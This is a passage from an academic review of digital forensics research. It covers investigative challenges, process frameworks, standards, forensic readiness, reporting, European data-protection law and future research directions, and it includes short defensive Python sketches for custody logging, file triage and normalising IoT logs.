dynamically. Note that data acquisition and management is a challenge affecting activities related to dig- ital forensics. 
Moreover, data fragmentation, a common sce- nario nowadays, hinders investigations further. It is important to note that data acquisition is critical to creating bench- marks, which help researchers and practitioners to evalu- ate their models. The latter enables characteristics such asreproducibility and pushes the advancement in the state of the art, which is needed to keep up with the pace of tech- nology development [148], [149]. The next most challenging issue is related to anti-forensics methods, which has been discussed in several sections of the taxonomy as well as in Section III-H. Anti-forensic strategies leveraged by malicious actors include adversarial methods such as obfuscation or encryption applied to, e.g., data and storage systems, as well as hardware-related technological challenges, such as mobile phones due to their inherent security measures, or in the case of drones due to their speci c particularities, and software, as well as in the case of malware. In the case of tools and eval- uation benchmarks, it is evident that the community needs to devote more efforts towards ghting novel cybercrime, especially in topics where, e.g., different data sources and technologies are present. For instance, in the case of IoT and UA Vs, different data sources may necessitate different digital forensics strategies, including tools related to device level forensics, network forensics, and cloud forensics. Another challenge that affects digital forensics is the lack of juris- dictional and legal requirements for different investigation scenarios such as ethics and data management of con dential and personal data. This is particularly relevant nowadays due to the widespread use of distributed systems such as blockchain and the cloud. The latter means that software and data may reside in different countries, and thus, speci c cross-border collaborations are required, adding another layer of complexity to digital investigations. Moreover, this sce- nario impedes the adoption of proactive measures due to the dif culty of applying measures that conform to different legal frameworks. A proper understanding between all the actors involved in the digital forensics context, including stakeholders, LEAs, and court members, is mandatory to ensure the success- ful prosecution of perpetrators. In this regard, one of the highlighted challenges is to ensure that all partners have a suf cient level of training (including technical knowledge and standardised guidelines) and a proper understanding, including readable reports to enable a fruitful collaboration. Moreover, while it seems procedural, the chain of custody is still a challenge. This can be attributed to multiple reasons, such as obvious negligence of the corresponding personnel to properly report evidence acquisition and/or handling, cor- rupted of cers, or even gaps in the process. Nevertheless, all of them cause severe issues in a court as a case can be missed or misjudged. Secure and auditable means of storing and processing the chain of custody, as proposed by LOCARD3 with the use of blockchain technology seems like a logical and stable solution. A more thorough description of forensic read- ability and its challenges is discussed later in Section IV-C. Data acquisition, as previously stated, is not only a chal- lenge in terms of the existing heterogeneous data sources and context but also in terms of size. The big data era comes with a myriad of opportunities but also with their corresponding 3https://locard.eu/ VOLUME 10, 2022 25475 F. 
Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 10. Cross-domain abstraction of the challenges and limitations of digital forensics, ordered by relevance according to the amount of times they were found in the topics of the taxonomy. For the sake of fairness, the general column Miscellaneous has been omitted. challenges, since logging and data acquisition in speci c scenarios may pose technical challenges. This issue is exacerbated when coupled with cross-border investigation requirements due to data fragmentation. Moreover, once data corresponds to multiple forensic contexts, the complexity of performing digital investigation grows exponentially, leaving aside the need to perform live forensics according to the par- ticularities of the hardware. Additionally, the availability of some devices due to their resource-constraint nature is a fur- ther challenge. For instance, IoT botnets have high volatility, and UA Vs may implement self-defence mechanisms, even at the physical level. In the case of the Miscellaneous category, we included the challenges and limitations of anti-forensics, drone forensics, smart grid, smart cities and social networks. According to the outcomes depicted in Table 10, we can observe that topics such as IoT, cloud, and mobile are affected by the highest amount of challenges. Therefore, we believe that researchers and practitioners should devote more efforts to solving such topics' challenges by leveraging cross-domain collaborations to enhance the quality and appli- cability of their outcomes. Similarly, other challenges which appear in several topics could be tackled more quickly if they were targeted with a multidisciplinary approach, with experts from the different digital forensics topics. To create a visual representation of these challenges, we believe that mapping each challenge into different cate- gories will highlight which need to be reinforced. Therefore, Figure 4presents the outcomes of our taxonomy in terms of topic challenges mapped into different categories repre- senting different phases, from the creation of the legal basis and framework of an investigation to the nal reporting of the outcomes. As it can be observed, the challenges most cited in the literature are present in the evidence acquisition and data pre-processing category. They are mainly related to data acquisition issues and anti-forensics. Notably, these challenges affect the forensic procedures from the beginning (i.e., if we do not consider the standards, legislation and procedural category), and thus, it is crucial to devote efforts toovercome them. The investigation and forensic analysis cat- egory contains the highest number of challenges. Therefore, the topics identi ed in the taxonomy share similar technical concerns in their corresponding contexts, and more multidis- ciplinary collaboration is needed towards such direction. The reporting and presentation category highlights one yet crit- ical challenge since the proper reporting of an investigation affects the outcome of the whole investigation. We further dis- cuss about forensic readability and reporting in Section IV-C. IV. DIGITAL FORENSICS METHODOLOGIES, PRACTICES AND STANDARDS In addition to the topic-based taxonomy presented in Section III, we collected a set of literature reviews, included in our research methodology, that analysed forensic frame- works and process models, and the adaptability and forensic readiness of the actual practices. 
In the following sections, we analyse the content of such reviews by extracting the chal- lenges and identifying the main qualitative features required to achieve forensically sound investigations. A. FORENSIC FRAMEWORKS AND PROCESS MODELS A digital forensics framework, also known as a digital foren- sics process model, is a sequence of steps that, along with the corresponding inputs, outputs and requirements, aim to sup- port a successful forensics investigation [150], [151]. A digi- tal forensics framework is used by forensics investigators and other related users to ease investigations and the identi cation and prosecution of perpetrators. In addition to a set of speci c steps identifying each investigation phase, the use of digital forensic frameworks enables timely investigations, as well as a proper reconstruction of the timeline of events and their associated data. In this regard, one of the most critical aspects of a digital investigation is the proper preservation of the evidence chain of custody, since it could lead to unsolvable inconsistencies, risking the admissibility of evidence in court. According to their phases and their granularity, there are different investigation models suitable for different types 25476 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews FIGURE 4. Main digital forensic challenges mapped into different categories according to their application context, from the initial steps of an investigation (left) to the final ones (right). The size of each circle denotes the times it appeared considering the topics of the taxonomy. of investigations. In this regard, Kohn et al. provide [152] an integrated suitability framework that maps a set of require- ments derived from an ongoing investigation to the most suitable forensic procedure. Moreover, the authors also use a graph-based approach to associate the most well-known forensic frameworks and their interrelationships regarding the number of phases and their content. Other well-known frameworks include the Analytical Crime Scene Procedure Model (ACSPM) [153], the Systematic digital forensic inves- tigation model (SRDFIM) [154], and the advanced data acquisition model (ADAM) [155]. In general, law enforce- ment agencies follow variants of the ACPO (Association of Chief Police Of cers) guidelines [156]. Finally, other foren- sic guidelines and models proposed by NIST and INTERPOL can be found in [5], [157]. The most well-known digital forensic frameworks are summarised in Table 11. In general, the procedures summarised in Table 11have a common hierarchical structure [165], [166], which can be divided in the steps described in Table 12. Note that some of the models may include more granular approaches to some of the steps, which are necessary due to the investigation context (e.g., speci c devices and seizure/acquisition constraints). In the case of the chain of custody and trail of events preservation, a forensically sound procedure needs to ensure features such as integrity, traceability, authentication, veri- ability and security [167], [168]. In this regard, Table 13 provides a description of each feature. In the past, several authors identi ed several challenges in digital investigation processes [77], [169][175], mainly related to the chain of custody preservation, the growth of the data to be processed, and privacy and ethical issues when collecting such data. 
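As a minimal technical illustration of how the chain of custody can be preserved and checked — a sketch with illustrative field names, not the mechanism of any specific framework cited here — the following hash-chained log makes every entry commit to its predecessor, so that integrity, traceability and verifiability can be tested automatically.

```python
# Minimal sketch: an append-only, hash-chained custody log in which every
# entry commits to the previous one, so later tampering breaks verification.
import hashlib
import json
from datetime import datetime, timezone

def _digest(entry):
    return hashlib.sha256(json.dumps(entry, sort_keys=True).encode()).hexdigest()

def append_entry(log, handler, action, evidence_sha256):
    entry = {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "handler": handler,
        "action": action,
        "evidence_sha256": evidence_sha256,
        "previous": log[-1]["digest"] if log else None,   # link to prior entry
    }
    entry["digest"] = _digest({k: v for k, v in entry.items() if k != "digest"})
    log.append(entry)
    return log

def verify(log):
    previous = None
    for entry in log:
        body = {k: v for k, v in entry.items() if k != "digest"}
        if entry["previous"] != previous or _digest(body) != entry["digest"]:
            return False
        previous = entry["digest"]
    return True

if __name__ == "__main__":
    log = []
    append_entry(log, "officer-17", "seized laptop", "ab" * 32)
    append_entry(log, "examiner-03", "created disk image", "cd" * 32)
    print("chain intact:", verify(log))
    log[0]["handler"] = "someone-else"   # simulated tampering
    print("chain intact after tampering:", verify(log))
```

Because each digest covers the previous entry's digest, modifying or reordering any record invalidates every subsequent link, which is precisely the property a custody trail needs.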
In addition, our research methodology identi ed several literature reviews which discussed the chal- lenges and limitations of forensic frameworks. For instance, in [176], the authors leveraged a summary of digital forensic frameworks and tools as well as their interrelationships by using a graph analysis methodology. In addition, they dis- cussed some challenges and limitations of privacy-preservingdigital investigation models and proposed some measures to palliate them. In [177] the authors presented a chronological review of the most well-known forensic frameworks and their characteristics. The work presented in [178] evaluates the cur- rent frameworks among European law enforcement agencies, identifying and de ning elements of robustness and resilience in the context of sustainable digital investigation capacity so that organisations can adapt and overcome deviations and novel trends. In [175], the authors identi ed the need to de ne speci c models according to the forensic context, such as in the case of Mobile Forensics [175]. Moreover, the authors proposed a speci c forensic framework to improve Mobile Forensics investigations. Further reviews of the most used forensic frameworks and their features can be found in [179], [180]. Table 14reports the main challenges in forensic frameworks identi ed by each literature review. In parallel to forensic guidelines and frameworks, stan- dards are crucial to ensure conformance and mutual compli- ance across geographical and jurisdictional borders. There are currently numerous standards and established practices pro- vided by organisations worldwide using accepted methods. The technical details on how to forensically approach a given investigation differ depending on the device. The analysis of electronic evidence is typically categorised into the phases stated in Table 12. However, the exact phases naming may vary due to different forensic models' usage according to each organisation's needs. While not an of cial standard, the Cyber-investigation Analysis Standard Expression (CASE)4is a community- driven standard that aims to develop an ontology that can ef - ciently represent all exchanged information and roles within the context of investigations regarding digital evidence. The International Organization for Standardization (ISO) has released a series of standards to assist in this effort by providing the family of ISO 27000, focusing on informa- tion security standardisation procedures. In what follows, 4https://caseontology.org/ VOLUME 10, 2022 25477 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 11. Most well-known forensic models and guidelines. TABLE 12. Main steps in a digital forensic investigation model. TABLE 13. Main features required to guarantee chain of custody preservation. we present the most relevant standards about digital forensics investigations, which are summarised in Figure 5. ISO/IEC 17025:2017: In some terms, this standard can be considered an ``infrastructure'' standard for forensic labs. It de nes the managerial and techni- cal requirements that testing and calibration labora- tories must conform to ensure technical competence and guarantee that their test are calibration results are acceptable by the corresponding suppliers and regulatory authorities. 
TABLE 14. High level extraction of challenges reported in forensic frameworks literature reviews.
ASTM E2916-19: The goal of this standard is to assemble the necessary technical, scientific and legal terms and the corresponding definitions in the context of the examination of digital and multimedia evidence. Therefore, the standard spans various areas such as computer forensics, image, audio and video analysis, as well as facial identification. As a result, ASTM E2916-19 creates a common language framework for all.
ISO 21043-2:2018: This standard specifies requirements for the forensic process, focusing on the recognition, recording, collection, transport and storage of items of potential forensic value. It includes requirements for the assessment and examination of scenes but is also applicable to activities that occur within the facility. This document also includes quality requirements.
ISO/IEC 27035: This is a three-part standard that provides organisations with a structured and planned approach to security incident management, covering a range of incident response phases.
ISO/IEC 27037:2012: This standard provides general guidelines for handling the evidence of the most common digital devices and circumstances, including devices that exist in various forms, giving the example of an automotive system [181].
ISO/IEC 27038:2014: Describes the digital redaction of information that must not be disclosed, taking extreme care to ensure that removed information is permanently unrecoverable.
FIGURE 5. Applicability of standards and guidelines to the investigation process classes and activities.
ISO/IEC 27040:2015: Provides detailed technical guidance on how organisations can define an appropriate level of risk mitigation by employing a well-proven and consistent approach to the planning, design, documentation, and implementation of data storage security.
ISO/IEC 27041:2015: Describes other standards and documents that provide guidance, setting out the fundamental principles that ensure tools, techniques and methods are appropriately selected for the investigation.
ISO/IEC 27042:2015: This standard describes how the methods and processes to be used during an investigation can be designed and implemented to allow correct evaluation of potential digital evidence, interpretation of digital evidence, and effective reporting of findings.
ISO/IEC 27043:2015: It defines the key common principles and processes underlying the investigation of incidents and provides a framework model for all stages of investigations.
ISO/IEC 27050: This recently revised standard guides non-technical and technical personnel in the handling of evidence on electronically stored information (ESI).
ISO/IEC 30121:2015: Provides a framework for organizations to strategically prepare for a digital investigation before an incident occurs, in order to maximise the effectiveness of the investigation.
ETSI is a European Standards Organization that produces standards for ICT systems and services used worldwide, collaborating with numerous organisations. In 2020, ETSI published TS 103 643 V1.1.1 (2020-01) [182], a set of techniques for assurance of digital material in a legal proceeding, VOLUME 10, 2022 25479 F.
Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews to provide a set of tools to assist the legitimate presentation of digital evidence.5In the meantime, the National Institute of Standards and Technology (NIST) has released guide- lines for organisations to develop forensic capability (see also Table 11), based on the principles of forensic science in the aspect of the application of science to the law. Still, it should not be used on digital forensic investigations due to subjection to different laws and regulations, as clearly stated in their manual. The scope of NIST guidelines is incorpo- rating forensics into the information system life cycle of an organisation. The most relevant guidelines are 800-86 [183] for Integrating Forensic Techniques into Incident Response and 800-101 [184] for Mobile Device Forensics. The Scienti c Working Group on Digital Evidence (SWGDE) is an organisation engaged in the eld of digital and multimedia evidence to foster communication and coop- eration as well as to ensure quality and consistency within the forensic community. SWGDE has released several documents to provide the current best practices on a large variety of state of the art forensics subjects. Nonetheless, none of them is targeting or addressing drone forensics's particularities. Finally, a review of the international development of forensic standards can be found in [185]. B. FORENSIC READINESS In the past, forensic investigations leveraged a post-event approach, mainly focusing on the analysis of data related to a past incident. In this regard, forensic readiness in terms of pro-active techniques and protocols appeared to minimise the cost and the impact of incidents and are widely used nowadays [15], [186][188]. We can nd different research approaches, such as the review conducted in [189], in which authors discussed how to achieve forensic readiness by collecting the opinion of experts to elaborate a readiness framework with which improve forensic investigations from an organizational per- spective. In the case of [190], authors discussed forensic readiness and several procedures to achieve it, such as fos- tering the use of Trusted Platform Modules (TPM). Other authors reviewed measures to achieve forensic readiness in a holistic way [15], [191][194], as well as recalling the relevance to include and expand the actual guidelines towards incident response readiness (e.g., as in the drafts of the ISO/IEC JTC 1/SC 27 working groups, and the ISO/IEC 27035), training and collaboration between stake- holders involved in forensic investigations and prosecution, and effective reporting readability and complexity. Table 15 describes the main forensic readiness challenges identi ed by the authors in the literature. Finally, in Table 16we provide a qualitative summary of the literature reviewed in IVaccording to the topics discussed in each article. From Table 16we can see that topics such as privacy and ethics and the suitability of frameworks that are being proposed to ght novel cybercrime need to be further 5https://www.swgde.org/documents/publishedTABLE 15. High level extraction of challenges reported in forensic readiness literature reviews. discussed in the literature. Nevertheless, as previously stated in the article, one of the main challenges is that cybercrime evolves faster than countermeasures and legislations, and thus, investigators are always one step behind. C. 
FORENSIC READABILITY AND REPORTING The continuous appearance of novel ICT technologies, paired with discovering new vulnerabilities and attacks that threaten them, dramatically increases the amount of information col- lected during forensic investigations. The latter refers to the amount of data collected from devices and systems, as well as the heterogeneous data structures required in each case and the speci c forensic methodologies developed to detect such threats. In this context, creating interoperable and auditable forensic procedures is a hard task, especially due to the lack of standardised reporting mechanisms. Moreover, qualitative aspects such as the outcomes and conclusions supported by the forensic analysis are often not reported accurately in an attempt to balance between technicality and comprehensibil- ity, hindering the robustness of the ndings [14], [198], [199]. Of particular relevance is the communication and readability of such reports, especially if these are to be interpreted by law practitioners, judges, and other stakeholders who do not always have the necessary technical background about the forensic tools nor the underlying technologies anal- ysed [200], [201]. The latter issue has been extensively anal- ysed according to different approaches, from lexical density and complexity [202][208], to cognitive and psychological features [209], [210], showcasing the need to improve the reporting mechanisms and the possible bene ts of a common, standardised framework. In addition to such a framework, it is crucial to develop the corresponding training procedures for its adoption [211]. It is necessary to recall that the admissibility of a piece of evidence and the forensic validation in court is mandatory to the proper prosecution of perpetrators and constitute the culminating point of an investigation [212], [213]. Therefore, several authors collected the challenges and issues related to the acceptance of evidence in court [196], [197], [212]. More- over, region-focused studies can be found in [213] and [197] for the United Kingdom and Australia, respectively. 25480 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 16. Qualitative analysis of the literature reviews related with digital forensic guidelines, frameworks, tools, and readiness. Notation: Xdenotes that this topic is analysed, while denotes that its only partially discussed or just named. TABLE 17. Proposed representation of the content of a forensic report according to the inputs collected from the literature. After analysing the previous literature of forensic reporting procedures and studying the technical level of the data to be included [214], [215], as well as analysing existing investiga- tion models such as ISO/IEC 27043:2015 [216], we identi ed a set of key points and structural features that such document should include. In parallel, we analysed the technical level associated with each characteristic as reported in the liter- ature and created a reporting guideline document, which is represented in Table 17. As it can be observed, summaries, overview descriptions and listings should be performed in a comprehensive, non-technical way. In the case of tool descriptions, as well as proofs guaranteeing the outcomes, the report should contain some technical yet understandable descriptions. 
Finally, the scienti c aspects and details behind the analysis and the corresponding methodologies require descriptions that should be provided by quali ed experts. D. DATA MANAGEMENT AND ETHICS When discussing digital forensics and respective technology readiness, the applicable regulatory frameworks should beconsidered as well. As seen in [195], integrating digital foren- sic readiness as a component in data protection legislation could improve actual practices across different sectors and countries. In particular, this section highlights the regulatory require- ments of working with data in Europe and in the European Union. To facilitate digital forensic readiness, tools should be developed and used in line with legal requirements, with special attention to the individual's privacy. 1) PRIVACY IN EUROPE States have numerous responsibilities concerning the protec- tion of their citizens. Although the protection of privacy (in its various forms) is important, it represents but one of the duties states should ful l [217]. Other prominent duties relate to the need to protect the life and property of citizens, to prevent disorder, to ensure that justice occurs where individuals have been the victim of criminal activity and to protect national security both of ine and online [218]. In modern western societies, it is often impossible to guarantee the exercise and protect such rights and in an absolute manner to all individuals all of the time due to competing interests of stakeholder groups. Respectively, privacy is only one of such values next to, e.g., security and the need for public order. To ensure security, the state likely has to take measures that may infringe upon the privacy of individuals [219]. This entails the acquisition of data or the conduct of surveillance to prevent inter alia acts of terrorism or crime. These activities clearly interfere with and limit the privacy of citizens but do so for desirable reasons. However, interference with such competing interests should be balanced, and the rights and freedoms of all groups in society should be respected to the greatest extent [217]. Respectively, the need to balance the privacy and security interests implies that security measures that infringe upon individual privacy are not acceptable unless they really are intended to meet a need that is relating to the protection the rights and interests of others. Where such VOLUME 10, 2022 25481 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews justi cation does not exist, infringement of individual privacy would not be acceptable. 2) DATA PROTECTION IN EUROPE In consonance with the individual's data protection inter- est and society's own protective endeavours toward ghting crime and securing national security, the Council of Europe and European Union developed a common framework to be observed by technology developers, security agencies, including Police, and criminal justice system. 
The most rel- evant instruments of the Council of Europe relating to the processing of data as evidence are: 1) the European Conven- tion for the Protection of Human Rights and Fundamental Freedoms (ECHR) in particular with reference to the protec- tion of the rights to privacy and due process, 2) the Council of Europe Convention on Cybercrime, as this Convention remains the main and only international treaty which de nes the substantive elements of cybercrimes [220], 3) the Council of Europe Convention on Mutual Assistance in Criminal Matters, and its 1978 Protocol [221], and 4) the Electronic Evidence Guide [222]. A second protocol concerning the ``Enhanced international cooperation on cybercrime and electronic evidence'' is also in development [223]. In European Union Art. 4 (2) of the Treaty on the Euro- pean Union (TEU) states that national security is the sole responsibility of each Member State. To facilitate a harmo- nized approach to national security, the EU adopted several Directives and other legislative pieces in connection with criminal matters such as: 1) Charter of Fundamental Rights of the European Union, art 7 and 8. 2) 2016/679 General Data Protection Regulation 3) Statement of the Article 29 Working Party, Data protection and privacy aspects of cross- border access to electronic evidence, Brussels, 29 November 2017. 4) 2016/680/EU Law Enforcement Directive [224] 5) 2014/41/EU European Investigation Order Directive 6) EU 2000 Convention on mutual assistance in criminal matters 7) 910/2014 eIDAS Regulation [225] 8) Electronic evidence - a basic guide for First Responders Good prac- tice material for CERT rst responders by ENISA, and 9) E-evidence package [226] To rationalize the functioning and limit the increasing num- ber of legal provisions, Regulation 2016/95 repealed certain acts in the eld of police cooperation and judicial cooperation in criminal matters [227]. LEAs performing digital forensics have con dentiality case levels depending on the severity of the crime. The forensic examiners sign a special con- dentiality agreement regarding data protection upon their employment. There are policies regarding data protection, all the case relevant data is kept only to the internal network, which is protected with the use of all the necessary measures (Secure Connections, encryption, controlled access at the physical location). The forensic examination equipment is not connected to the internet when examinations are conducted. The data in question in digital forensics is referred to as elec- tronic evidence, de ned as ``any information (comprising theoutput of analogue devices or data in digital format) of poten- tial probative value that is manipulated, generated through, stored on or communicated by any electronic device'' [228]. Respectively, to use such data, speci c rules concerning the gathering and use of (digital) evidence should be adhered to as well. Electronic evidence is admissible in courts when the following sets of rules are adhered to: 1) general rules and principles concerning due process in criminal proceedings; 2) general rules of evidence in criminal proceedings and; 3) speci c rules relating to electronic evidence in criminal proceedings [229]. There are both current, and to-be adopted elements of the applicable legal framework, but it must be underlined that as of now, there is no comprehensive international or European legal framework providing rules relating to evidence [230]. 
From these documents, ve overarching principles can be deducted concerning the acquisition and use of electronic evi- dence. These are: data integrity, audit trail, specialist support, appropriate training, and legality [231]. National criminal procedure codes (referred above) contain further, speci c provisions regarding the record and applicability of digital evidence in criminal procedures. V. DISCUSSION In Section III, we provided a topic-based taxonomy of the digital forensics literature. In what follows, we recall the chal- lenges identi ed in each category and provide some strategies to overcome them. A. THE ROAD AHEAD IN DIGITAL FORENSICS' TOPICS After revising the challenges collected in cloud forensics, most of them are closely related to data management. More concretely, data acquisition, logging, limited access to foren- sic data, cross-border data access and exchange are vital parameters in cloud forensics. In terms of log management, Marty [232] proposed using log management architecture and the guidelines for application logging in SaaS service model using technologies such as Django, Javascript, Apache, and MySQL. A centralised logging scheme was proposed by Trenwith and Venter [233] to accelerate the investigation process and provide forensic readiness. Patrascu and Patri- ciu [234] proposed a scheme to monitor various parallel activities in a cloud environment. In addition to the pre- vious works, several authors have devoted efforts towards ef cient and secure evidence management in the cloud [235][237], including the use of blockchain such as seen in [238]. We believe that ef cient evidence and logging col- lection mechanisms paired with secure and veri able man- agement of such evidence are crucial to guarantee sound cloud forensic investigations. Network traf c forensics is a long-standing domain with numerous research efforts and tools. The main gaps that currently exist and on which future efforts shall be focused are related to the volume of the traf c, the different protocols that emerge mainly due to the IoT rise, and the fact that traf c is encrypted in most cases. As the use of computer systems and 25482 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews the internet grows exponentially, the network traf c size to be analysed to conduct a forensics investigation rises. Methods that can ef ciently analyse voluminous traces of network traf c are in high demand. Additionally, the heterogeneity of network traf c protocols increases the effort required to collect evidence from all available sources. Last but not least, the main challenge that network foren- sics research faces nowadays is encrypted traf c. When dig- ital forensic evidence acquisition happens at an intermediate node of the communication path, it is expected for the traf c payload to be encrypted, and methods capable of extracting information under such conditions are required. Filesystems, Memory, and Data Storage forensics have attracted the research community's attention, as they are an abundant source of digital evidence. As discussed in Section III-E, the main challenge of these domains lies in the fact that there exist a large number of les and data contained in them. Thus, the efforts should focus on big data analysis and data mining techniques to extract the relevant investigation data from the vast amount of unrelated or redun- dant digital objects. 
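One common way to tame these data volumes during triage is known-file filtering; the sketch below — with an illustrative evidence path and a toy reference hash set — discards files whose SHA-256 digest appears in a corpus of known, uninteresting files, so that only unknown material is passed on for deeper analysis.

```python
# Minimal sketch: known-file filtering during triage. The evidence path and
# the reference hash set are illustrative placeholders.
import hashlib
from pathlib import Path

KNOWN_GOOD = {
    # Digests imported from a reference corpus of stock OS/application files.
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",  # empty file
}

def sha256_of(path, chunk_size=1 << 20):
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def triage(evidence_root):
    for path in Path(evidence_root).rglob("*"):
        if not path.is_file():
            continue
        if sha256_of(path) not in KNOWN_GOOD:
            yield path   # only unknown files are forwarded for deeper analysis

if __name__ == "__main__":
    for candidate in triage("/mnt/evidence"):
        print(candidate)
```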
Another issue is the case of distributed filesystems and databases or data stores, or when the forensic analysis should be conducted in the cloud. The latter case, besides requiring specialised tools and methods, also poses challenges for collaboration and cooperation with the cloud service providers. Finally, most research works and tools are bound to a specific system architecture, OS, or hardware implementation, so adjusting existing solutions to new use cases and problems becomes cumbersome. In this context, more generic approaches that allow tool reuse in different cases are necessary.

The recovery of digital evidence from portable and/or mobile devices is the focus of mobile forensics (MF), a sub-branch of digital forensics. Seizure, acquisition, and examination/analysis are the three categories that mobile forensics processes fall into. Several challenges exist concerning mobile forensics, as presented in Section III-C. In the MF domain, the variety of embedded OSs with shorter product life cycles and the numerous smartphone manufacturers worldwide present significant challenges for applying sound forensics approaches. MF, in general, presents a variety of challenges, such as problems with data (anonymity-enforced browsing and other anonymity services, and the considerable volume of data acquired during an investigation), availability of forensic tools (MF research has long focused on acquisition techniques, while minor importance was given to the other phases of the MF investigative process) and security-oriented concerns (development of new and more sophisticated anti-forensic methods by mobile manufacturers). It is worth noting that MF is confronted with significant challenges regarding the overall focus of MF processes. For example, it is unclear whether investigation procedures should be model-specific for each device or generic enough to form a standardized set of forensics procedure guidelines. Another critical issue is the requirement to perform live forensics (mobile devices should be powered on). Finally, due to the security features built into modern mobile devices, an investigator must break into the device using an exploit that will almost certainly alter the data.

While the widespread adoption of IoT devices and IoT-related applications has improved data availability and operational excellence, it has also introduced new security and forensics challenges. As presented in Section III-D, several challenges exist concerning IoT forensics. Such challenges include managing multiple streams of data sources, the complicated three-tier architecture of IoT, and the lack of standardized systems for capturing real-time logs and storing them in a valid uniform form. The preparation of highly detailed reports of all information gathered and its corresponding representation also serve as barriers to establishing sound IoT-related forensics mechanisms. Data encryption trends are also posing new challenges for IoT forensic investigators, and cryptographically protected storage systems are arguably one of the most significant roadblocks to effective digital forensic analysis. Interoperability and availability issues related to the vast number of connected IoT devices, the Big Data nature of IoT forensics evidence, and the various secure storage challenges of such evidence also represent significant IoT-related forensics challenges.
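As a concrete illustration of the uniform-format problem raised above, the sketch below normalises two invented vendor log layouts into a single event schema and seals each record with a digest. All device types, field names, and input layouts are assumptions made for this example, not a proposed standard or an existing vendor API.

```python
"""Minimal sketch of normalising heterogeneous IoT logs into one uniform event format.

The two input layouts and every field name are illustrative assumptions, not an
actual vendor schema or a standardised format from the surveyed literature.
"""
import hashlib
import json
from datetime import datetime, timezone
from typing import Any


def normalise_camera_event(raw: dict[str, Any]) -> dict[str, Any]:
    """Map a hypothetical camera log record to the common schema."""
    return {
        "device_id": raw["cam_id"],
        "timestamp": datetime.fromtimestamp(raw["ts"], tz=timezone.utc).isoformat(),
        "event_type": raw["event"],
        "source_format": "camera_v1",
    }


def normalise_thermostat_event(raw: dict[str, Any]) -> dict[str, Any]:
    """Map a hypothetical thermostat log record to the common schema."""
    return {
        "device_id": raw["serial"],
        "timestamp": raw["time_utc"],
        "event_type": f"setpoint_change:{raw['target_c']}",
        "source_format": "thermostat_v2",
    }


def seal(event: dict[str, Any]) -> dict[str, Any]:
    """Attach a SHA-256 digest of the canonical JSON so later tampering is detectable."""
    canonical = json.dumps(event, sort_keys=True, separators=(",", ":"))
    return {**event, "record_sha256": hashlib.sha256(canonical.encode()).hexdigest()}


if __name__ == "__main__":
    events = [
        seal(normalise_camera_event({"cam_id": "cam-7", "ts": 1650000000, "event": "motion"})),
        seal(normalise_thermostat_event({"serial": "TH-42", "time_utc": "2022-04-15T06:00:00+00:00", "target_c": 23})),
    ]
    print(json.dumps(events, indent=2))
```

The point of the sketch is not the particular fields but the design choice: once heterogeneous sources are mapped to one sealed record format, storage, correlation, and integrity verification can be handled uniformly across devices.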
Finally, the IoT forensics domain faces several regulatory challenges, particularly those relating to data ownership in the cloud as defined by regional laws.

As seen in Section III-G, multimedia forensics is one of the most explored topics, according to the number of publications. Overall, while most authors focus on image forgery detection, anti-forensics is one of the most challenging problems. In this regard, more efforts should be devoted to countering anti-forensic mechanisms (i.e., as part of a global digital forensics concern) and to methodologies that capture novel criminal trends with the help of sophisticated real-time object detection and classification systems. In addition, multi-layer systems and ontologies should be designed to cope with multiple threats at once, paired with the appropriate benchmarks to evaluate them. In parallel, the issues related to the vast amount of data to be processed should be minimised by proposing more efficient data storage and indexing mechanisms and by introducing algorithms that can process, e.g., compressed data. Following such research paths and combining them with the proper legislation and standardisation mechanisms will improve the success of multimedia digital forensics investigations.

Blockchain forensics is a relatively new domain, since blockchain technology has existed for only about a decade. In general, it has to be understood that the need for blockchain forensics methods is expected to grow in the coming years. As discussed in Section III-F, current efforts focus on the examination of available data on public blockchain systems. One of the main challenges encountered is to provide efficient methods to conduct such analysis. The data on public ledgers continuously grows, while the storage structure differs amongst implementations. Developing methods and tools that can efficiently analyse data across commonly used blockchain platforms is required. Moreover, forensic analysis methods for blockchain systems' nodes will enable more thorough investigations with more detailed results for public and private blockchain systems. Finally, given the rising popularity of privacy-enabled blockchain systems such as Monero or Zcash, additional effort will be required to support forensic investigations of cases that include interactions with such systems.

B. OPEN ISSUES AND FUTURE TRENDS
1) FORENSIC READINESS AND REPORTING
Given the continuous evolution of cybercrime and its harmful capacities, preventive strategies are paramount to fight criminal activities. This implies the need to reinforce digital forensic strategies at different levels, including guidelines, regulations, research and training, in order to implement forensic readiness holistically. According to our literature analysis, one of the key points to reinforce the current state of practice is the definition of interoperable and easy-to-adopt legislation, since current laws cannot cope with the increasing sophistication and the ubiquitous nature of cybercrime. Therefore, it is crucial to devote efforts towards, e.g., interoperable cross-border models with their corresponding dissemination and training procedures, which all practitioners may adopt to accelerate investigations. It is also relevant to stress the necessity of appropriate forensic readability and reporting.
First, effective communication between all the actors involved in a forensic investigation is essential to maximise the guarantees in court. Second, the proper documentation of investigations provides valuable feedback for future investigations, enhancing forensic readiness strategies. Third, the definition of a common reporting framework can accelerate investigations, in which speed is sometimes crucial due to, e.g., the possible volatility of evidence or the need to reduce harm. To this end, we proposed a forensic reporting content representation by following the common denominators found in the literature in Section III. We argue that devoting more effort to this final part of the forensic flow will enrich investigations with valuable feedback and stronger prosecution guarantees.

2) FORENSIC PREPAREDNESS AND STANDARDS
While in Section IV we provided an overview of digital forensics standards, unfortunately, they do not suffice for current needs. To name just two gaps standing out at the tip of the iceberg, cloud- and mobile-related investigations need standards on how they should be performed. Addressing the need for mobile forensics, FORMOBILE (https://formobile-project.eu/) has initiated a broad dialogue and is developing a draft CENELEC Workshop Agreement to fill in this gap. However, due to the specificities of cloud, IoT, drones, etc., similar actions are expected in the near future.

